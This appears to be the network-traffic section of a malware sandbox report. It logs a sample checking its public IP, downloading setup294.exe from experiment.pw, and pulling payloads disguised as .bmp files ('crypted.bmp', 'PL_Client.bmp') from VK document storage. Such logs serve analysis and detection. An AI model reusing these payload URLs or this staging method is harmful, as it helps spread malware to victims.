Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LrOA94xKc1WQy%2BFLSSYDYsQu5m7g1wlBUMPjLdFxq7%2BpOTsqgYMXRRHPW61XZmBfINyQ%2B7lviQ58QBC5boZ3vxUCvn75DHzXyQJSWm1APHq32Ps%2BmK55%2FRDudD%2F88A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c4cd5c9129df-FUK

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:30 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335662 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Fri, 25 Oct 2024 09:59:58 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; expires=Sat, 26 Oct 2024 03:14:29 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=f6a3c558ea2f3e8ecb; expires=Wed, 23 Oct 2024 09:55:41 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; expires=Wed, 30 Oct 2024 08:49:38 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: experiment.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:14:34 GMT Content-Type: application/x-msdos-program Content-Length: 2591936 Connection: keep-alive Last-Modified: Fri, 27 Oct 2023 02:28:04 GMT ETag: "278cc0-608a970217500" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1974 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9hkVH0zIW6%2FUSBZklN0rBxWF5%2BpLVBlVvnxmswNtUH3WCPaviz5nCBAGUaU0lQN4Z5BiMuTRXDcFfVSCjyqvIOlawHM2FzmnxMFelqoenebgzEvsxnxwE%2Bid3yT7s4y2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81c7c5088de72f50-LAX alt-svc: h3=":443"; ma=86400

GET /doc825067038_675094078?hash=yy528d2cdSWh8Qb1vjKZzrbg9uO0tUhBgbnW8xFFc7g&dl=fzvSk2lE8vQ96mfYErqNUoJZiKQg6dRgeIDz0UiA5W8&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:38 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c237331/u825067038/docs/d49/2fa5bb09a502/PL_Client.bmp?extra=hoE_PGrrkY5d2NqippbG-UTIRwu_h48s7-Mi86qburxYxYP2a4nfRxp8kaKBiRxuro79vWtZxNk0QuVAV280jjii1nd_0ovq3qK0e2f0q64HOWQQ6l8DT724JVMNbiPaXVLRXVti3oXOXSvj6A X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u825067038/docs/d49/2fa5bb09a502/PL_Client.bmp?extra=hoE_PGrrkY5d2NqippbG-UTIRwu_h48s7-Mi86qburxYxYP2a4nfRxp8kaKBiRxuro79vWtZxNk0QuVAV280jjii1nd_0ovq3qK0e2f0q64HOWQQ6l8DT724JVMNbiPaXVLRXVti3oXOXSvj6A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:39 GMT Content-Type: image/x-ms-bmp Content-Length: 3685892 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 06:43:31 GMT ETag: "653a0a93-383e04" Expires: Sun, 26 Nov 2023 03:14:39 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_667299917?hash=ZBXZXgvR0VGrrHhRL8ouG0pmaOgq5CMqSVSg07KQ3kD&dl=VP4eeCrZnI7ZSJlYk7MTGWNlWtWgIwQmPzfjoXznkSD&api=1&no_preview=1#ww11 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:42 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909218/u52355237/docs/d42/5ea1ce9e9941/WWW11_32.bmp?extra=ytZfQv4RrE3t_njKlOfujRBbAbSsxpWTLHad68C6dj6dfnRUGMYwA5OymD16HSt28U1ha3InbqaN3PeokRDsnMPVFZj8LjDGWM_FUjVdq1bZYMxrIHBkE9qZnO3K1PZLO5_oK1_vX6oi9fyX X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc825067038_675098543?hash=fDGebbbbT59ZXUS0aTzHqJh9k55SUFqRxrdzJALVzSP&dl=VyQDbVL7k7q0VT6QORxGuLdfGzZ7nqAOWUJBLGBju7c&api=1&no_preview=1#test22 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:42 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c235031/u825067038/docs/d50/da83a607ce58/file261023.bmp?extra=oZYPM_XOV2yUnI1OIkqXvssiCX90LOMpdatPJ3Mo-Iy7KPl61syaohofhhshJ3MqAGzAGOOjyd2hns--mq7Yi8XIYXFJZP2JkQdW10m1262TpjTS9wualsTezDU7MTljJq1XP6azEUjxwVkt_Q X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235031/u825067038/docs/d50/da83a607ce58/file261023.bmp?extra=oZYPM_XOV2yUnI1OIkqXvssiCX90LOMpdatPJ3Mo-Iy7KPl61syaohofhhshJ3MqAGzAGOOjyd2hns--mq7Yi8XIYXFJZP2JkQdW10m1262TpjTS9wualsTezDU7MTljJq1XP6azEUjxwVkt_Q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:42 GMT Content-Type: image/x-ms-bmp Content-Length: 705540 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 08:57:40 GMT ETag: "653a2a04-ac404" Expires: Sun, 26 Nov 2023 03:14:42 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909218/u52355237/docs/d42/5ea1ce9e9941/WWW11_32.bmp?extra=ytZfQv4RrE3t_njKlOfujRBbAbSsxpWTLHad68C6dj6dfnRUGMYwA5OymD16HSt28U1ha3InbqaN3PeokRDsnMPVFZj8LjDGWM_FUjVdq1bZYMxrIHBkE9qZnO3K1PZLO5_oK1_vX6oi9fyX HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:42 GMT Content-Type: image/x-ms-bmp Content-Length: 5983748 Connection: keep-alive Last-Modified: Mon, 23 Oct 2023 08:43:46 GMT ETag: "65363242-5b4e04" Expires: Sun, 26 Nov 2023 03:14:42 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc52355237_666778887?hash=MsypGwgfzH9k8tAFuGqJl0MJgVVDiak3EKsK8zRZBXP&dl=zbnEaURFd1h1t5v6QgcpBauCKgnVbU0YGtRdWYWulE8&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:44 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335594 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc825067038_675084444?hash=k5PecVfBQzPaee7oBSXUMlbMI8WyGwsz9sC7fI90JQs&dl=KIXZTpWuxh6zhpZ3P1E5BeGpD6wWJ27NEZ8qKC46TGL&api=1&no_preview=1#good HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:44 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c235031/u825067038/docs/d20/a29a3db0069e/fresh1.bmp?extra=1dRSa-0TgJXqa93p4EbSQk90rNhKUH9so_jMimdjR_fNC7yh-U0RyUPFHhbKcUIbyspnMp2_-SsDdNtn56RI5ilXyOziZCizDJ2AoOkqCch-5X1wkTeC416YOe_GFTo7wCHGV03e__SBLuJNdQ X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235031/u825067038/docs/d20/a29a3db0069e/fresh1.bmp?extra=1dRSa-0TgJXqa93p4EbSQk90rNhKUH9so_jMimdjR_fNC7yh-U0RyUPFHhbKcUIbyspnMp2_-SsDdNtn56RI5ilXyOziZCizDJ2AoOkqCch-5X1wkTeC416YOe_GFTo7wCHGV03e__SBLuJNdQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:45 GMT Content-Type: image/x-ms-bmp Content-Length: 512076 Connection: keep-alive Last-Modified: Wed, 25 Oct 2023 19:02:17 GMT ETag: "65396639-7d04c" Expires: Sun, 26 Nov 2023 03:14:45 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:47 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335677 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:48 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 335678 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc825067038_675120414?hash=ofV8tZWtQDknSObErFUq2rnV3Esz6p3eJRLOo5yZ3Bg&dl=3JL9LytHzeNyclBz9CDzoiw11Ovw4rTGzbKz11MEPvw&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:50 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909418/u825067038/docs/d26/484476cefcda/crypted.bmp?extra=xKumbx-TTXs_1he4_Ei0XOGCQ7hjCAmh0Tfxiar8m_-yHzKu8fpiKEbsBT6lBgNyPmwVvmrnWrMWcYvr0uDWeewVVOX6C76OSOO6saJLa-Sb0UvH22ikkXipev0DFE-_kzKEApKnwBDNKESMfw X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_667323207?hash=ZkIwTTYNTwNDXLt5Gs5EEchtp6n7cf7VmKRYfvfVcZc&dl=ZTGusJZiietYLrS13VtWmnhjrFLGcXrZJST1wXSwTtP&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9113008033764787759_hVgcSPifUsIAAhjNAi9wC8MHc1fHmRDZvzbAsjZtclH; remixlgck=f6a3c558ea2f3e8ecb; remixstid=498352845_tnsKosZA8o4nBezzZmzDrQyX8Co48jS2wjFEH5dl5iH

HTTP/1.1 302 Found Server: kittenx Date: Fri, 27 Oct 2023 03:14:50 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114888 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909518/u52355237/docs/d59/1bb094138bd6/d432j89adg.bmp?extra=uZ0kz3xyyLQRpHyiIUVDgzVuc8ISnjGwzHU3Zj5l6-kOEBCA2aVwbMUmknHcD5WrU8GfP7b98J-VdksDqOUosQfPqiGhAbCxWrH-Idsh_1XZ-Z0T00Y9APKnURqnh4Q2r8vMm2YUqVDohxSj X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909418/u825067038/docs/d26/484476cefcda/crypted.bmp?extra=xKumbx-TTXs_1he4_Ei0XOGCQ7hjCAmh0Tfxiar8m_-yHzKu8fpiKEbsBT6lBgNyPmwVvmrnWrMWcYvr0uDWeewVVOX6C76OSOO6saJLa-Sb0UvH22ikkXipev0DFE-_kzKEApKnwBDNKESMfw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:50 GMT Content-Type: image/x-ms-bmp Content-Length: 1165828 Connection: keep-alive Last-Modified: Thu, 26 Oct 2023 17:04:44 GMT ETag: "653a9c2c-11ca04" Expires: Sun, 26 Nov 2023 03:14:50 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909518/u52355237/docs/d59/1bb094138bd6/d432j89adg.bmp?extra=uZ0kz3xyyLQRpHyiIUVDgzVuc8ISnjGwzHU3Zj5l6-kOEBCA2aVwbMUmknHcD5WrU8GfP7b98J-VdksDqOUosQfPqiGhAbCxWrH-Idsh_1XZ-Z0T00Y9APKnURqnh4Q2r8vMm2YUqVDohxSj HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Fri, 27 Oct 2023 03:14:52 GMT Content-Type: image/x-ms-bmp Content-Length: 351236 Connection: keep-alive Last-Modified: Mon, 23 Oct 2023 17:30:31 GMT ETag: "6536adb7-55c04" Expires: Sun, 26 Nov 2023 03:14:52 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

